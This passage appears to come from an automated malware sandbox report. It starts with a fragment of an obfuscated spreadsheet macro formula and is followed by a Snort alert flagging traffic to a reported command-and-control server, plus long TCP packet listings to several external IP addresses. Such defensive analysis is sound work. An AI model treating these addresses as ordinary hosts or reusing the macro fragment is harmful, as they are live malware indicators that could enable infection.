ESRSGB1'!G44)&'ESRSGB1'!H46)&'ESRSGB1'!J44,F35), 0

                                                                                                                    Network Behavior

                                                                                                                    Snort IDS Alerts

                                                                                                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                    192.168.2.22198.199.70.224917780802404322 08/06/22-09:20:53.106547TCP2404322ET CNC Feodo Tracker Reported CnC Server TCP group 12491778080192.168.2.22198.199.70.22

                                                                                                                    Network Port Distribution

                                                                                                                    TCP Packets

                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                    Aug 6, 2022 09:20:16.356266975 CEST49171443192.168.2.22208.67.23.91
                                                                                                                    Aug 6, 2022 09:20:16.356326103 CEST44349171208.67.23.91192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:16.356409073 CEST49171443192.168.2.22208.67.23.91
                                                                                                                    Aug 6, 2022 09:20:16.375463963 CEST49171443192.168.2.22208.67.23.91
                                                                                                                    Aug 6, 2022 09:20:16.375492096 CEST44349171208.67.23.91192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:16.864212036 CEST44349171208.67.23.91192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:16.864309072 CEST49171443192.168.2.22208.67.23.91
                                                                                                                    Aug 6, 2022 09:20:16.878142118 CEST49171443192.168.2.22208.67.23.91
                                                                                                                    Aug 6, 2022 09:20:16.878160000 CEST44349171208.67.23.91192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:16.878542900 CEST44349171208.67.23.91192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:16.878638983 CEST49171443192.168.2.22208.67.23.91
                                                                                                                    Aug 6, 2022 09:20:17.150321960 CEST49171443192.168.2.22208.67.23.91
                                                                                                                    Aug 6, 2022 09:20:17.195363998 CEST44349171208.67.23.91192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:17.344319105 CEST44349171208.67.23.91192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:17.344535112 CEST49171443192.168.2.22208.67.23.91
                                                                                                                    Aug 6, 2022 09:20:17.344551086 CEST44349171208.67.23.91192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:17.344624043 CEST49171443192.168.2.22208.67.23.91
                                                                                                                    Aug 6, 2022 09:20:17.345534086 CEST49171443192.168.2.22208.67.23.91
                                                                                                                    Aug 6, 2022 09:20:17.345561981 CEST44349171208.67.23.91192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:17.345572948 CEST49171443192.168.2.22208.67.23.91
                                                                                                                    Aug 6, 2022 09:20:17.345634937 CEST49171443192.168.2.22208.67.23.91
                                                                                                                    Aug 6, 2022 09:20:17.907493114 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:17.955605030 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:17.955733061 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:17.956005096 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.004107952 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.101455927 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.101490021 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.101511002 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.101535082 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.101555109 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.101566076 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.101586103 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.101591110 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.101597071 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.101619959 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.101619959 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.101646900 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.101658106 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.101670980 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.101676941 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.101699114 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.101706028 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.101717949 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.101758003 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.106215000 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.149869919 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.149924994 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.149971008 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.150001049 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.150046110 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.150094986 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.150105000 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.150132895 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.150139093 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.150156975 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.150177002 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.150208950 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.150228977 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.150259972 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.150270939 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.150310040 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.150330067 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.150361061 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.150369883 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.150412083 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.150420904 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.150460958 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.150475025 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.150523901 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.150902033 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.198625088 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.198654890 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.198673010 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.198709011 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.198725939 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.198744059 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.198761940 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.198779106 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.198796034 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.198812962 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.198833942 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.198857069 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.198869944 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.198877096 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.198896885 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.198911905 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.198915958 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.198935986 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.198936939 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.198956013 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.198976040 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.198976994 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.198999882 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.199006081 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.199023008 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.199035883 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.199045897 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.199065924 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.199069977 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.199090004 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.199100018 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.199110031 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.199140072 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.199177980 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.199963093 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.247195005 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.247243881 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.247284889 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.247324944 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.247400999 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.247459888 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.247468948 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.247493029 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.247495890 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.247519970 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.247528076 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.247570038 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.247598886 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.247626066 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.247629881 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.247679949 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.247690916 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.247730017 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.247740030 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.247782946 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.247817993 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.247829914 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.247840881 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.247883081 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.247895956 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.247935057 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.247948885 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.247981071 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.248003960 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.248033047 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.248039961 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.248084068 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.248100996 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.248136997 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.248146057 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.248188019 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.248198032 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.248239040 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.248255014 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.248289108 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.248308897 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.248341084 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.248352051 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.248389959 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.248405933 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.248428106 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.248450994 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.248451948 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.248501062 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.248512983 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.248553038 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.248560905 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.248608112 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.248613119 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.248658895 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.248666048 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.248719931 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.249072075 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.249278069 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.296808004 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.296845913 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.296875000 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.296901941 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.296930075 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.296931982 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.296957970 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.296961069 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.296967983 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.296984911 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.297008991 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.297014952 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.297044039 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.297045946 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.297077894 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.297105074 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.297122955 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.297137022 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.297159910 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.297189951 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.297198057 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.297224045 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.297236919 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.297266006 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.297291040 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.297302961 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.297322035 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.297342062 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.297349930 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.297375917 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.297401905 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.297413111 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.297434092 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.297449112 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.297481060 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.297485113 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.297516108 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.297523975 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.297547102 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.297560930 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.297590971 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.297610998 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.297625065 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.297658920 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.297663927 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.297691107 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.297702074 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.297719002 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.297736883 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.297764063 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.297775030 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.297797918 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.297812939 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.297847033 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.297856092 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.297873020 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.297885895 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.297910929 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.297921896 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.297955990 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.297955990 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.297986031 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.297995090 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.298019886 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.298032045 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.298048019 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.298064947 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.298093081 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.298101902 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.298129082 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.298137903 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.298170090 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.298172951 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.298206091 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.298214912 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.298238039 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.298243999 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.298278093 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.298281908 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.298312902 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.298321009 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.298336983 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.298355103 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.298377991 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.298398972 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.298419952 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.298510075 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.299587965 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.346537113 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.346579075 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.346599102 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.346616983 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.346636057 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.346654892 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.346658945 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.346674919 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.346685886 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.346690893 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.346693993 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.346695900 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.346719027 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.346729040 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.347549915 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.347574949 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.347594023 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.347614050 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.347621918 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.347632885 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.347635984 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.347652912 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.347660065 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.347673893 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.347676992 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.347692966 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.347692966 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.347702980 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.347712994 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.347724915 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.347729921 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.347749949 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.347758055 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.347769976 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.347770929 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.347788095 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.347790003 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.347805977 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.347807884 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.347821951 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.347824097 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.347837925 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.347842932 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.347862959 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.347866058 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.347879887 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.347882986 CEST4917280192.168.2.22188.132.217.108
